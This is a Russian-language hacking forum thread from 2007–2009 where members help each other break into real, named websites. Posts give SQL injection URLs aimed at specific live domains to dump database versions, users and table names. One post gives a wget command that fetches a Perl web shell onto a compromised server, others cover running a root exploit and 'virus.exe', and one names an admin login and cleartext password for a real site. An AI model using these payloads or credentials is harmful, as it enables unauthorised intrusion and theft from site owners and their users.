Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Залей шелл куда-нибудь, на тот же народ.
    потом скачай его на сервер командой
    wget http://yoursite.com/perlshell.pl

    только вопрос зачем перл шелл, если уже есть пхп-шелл, при этом даже доступны системные команды?
     
  2. totem

    totem New Member

    Joined:
    25 Jan 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -5
    скомпилил, запускаю рут сплойт, пишет:
    /bin/sh: line 5: ./a: Permission denied
    что это значит ???
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    ну а ты сам-то как думаешь? М.б. перевести эту надпись?

    не боись, переводи, и тебе откроются великие тайны
     
  4. totem

    totem New Member

    Joined:
    25 Jan 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -5
    Может есть вариант это обойти ? Я не совсем врубаюсь это интерпретатор не может его запустить или сам сплойт не может sh запустить ?
     
  5. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    Перевожу, ибо не могу на это смотреть
    /bin/sh строка 5 ./a доступ запрещен

    З.Ы писец,в разделе уязвимости переводом занимаюсь!
     
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    _http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),0x27,10+--+
    грубо говоря чтоб был редирект нужно чтобы 9-е поле возвращало нечисловой результат.

    2totem
    chmod +x a
     
    #9206 Scipio, 9 Oct 2009
    Last edited: 9 Oct 2009
    2 people like this.
  7. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Подскажите плиз
    Code:
    http://www.dvds4vets.org/admin/
    нашел лог и пасс Administrator:Larry
    пас не был зашифрован, но в админку не пускает, в чём ошибка?
     
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    1) Данные могут быть не 100% правильные, т.к.может ты с другой БД вытащил, или что-нибудь еще...
    2) Админка может быть поддельная
     
  9. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    2Torentte

    Логин stev444
    Пароль Larry
     
  10. LolFEm

    LolFEm Elder - Старейшина

    Joined:
    8 Sep 2006
    Messages:
    160
    Likes Received:
    52
    Reputations:
    5
    Code:
    http://www.trancosoreceptivo.com.br/pt-br/publica/passeios.php?tipo=2&id=11'
    возможно это дальше раскрутить?
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204


    А в чем проблема? о_0
    http://www.trancosoreceptivo.com.br/pt-br/publica/passeios.php?tipo=2&id=-11+union+select+concat_ws(0x3a,version(),user(),database()),2,3--

    P.S.:
    Не забывайте пробелы убирать!
     
    2 people like this.
  12. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Люди, помогите найти таблу с паролькой, я все 70 перебрал, нет там паролей блин...плиз

    HTML:
    http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%201,1%20--
     
  13. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Никто за тебя перебирать ничего не будет! Пища для размышления:
     
  14. andrrr

    andrrr New Member

    Joined:
    19 Sep 2009
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Скажите, пожалуйста, можно ли узнать какие демоны запущены на сервере, если смотреть не из под рута? Если так нельзя, то как их искать и проверять от какого пользователя тот или иной работает ?
     
  15. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    В ковычки пробывал брать путь вместе с названием файла?
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    cd c:\
    virus.exe
     
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    так порутай его и запусти, в винде вроде не сложно это сделать :)

    попробуй

    CD\
    cmd /k file.exe
     
    _________________________
    #9217 HAXTA4OK, 10 Oct 2009
    Last edited: 10 Oct 2009
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Nightmarе, так и запускай
    Code:
    C:\Virus.exe
    Если не помогает:
    Code:
    cd /d c:\
    virus.exe
    Порутать винду? :)
     
    1 person likes this.
  19. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    Это выходит что надо путь попробовать прописать к файлу.Попробуй.
     
  20. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    а разве не так в винде запускать надо?
    start calc.exe
    хотя наверн не принципиально, туплю я ;)
     
    #9220 Dyxxx, 10 Oct 2009
    Last edited: 10 Oct 2009
Thread Status:
Not open for further replies.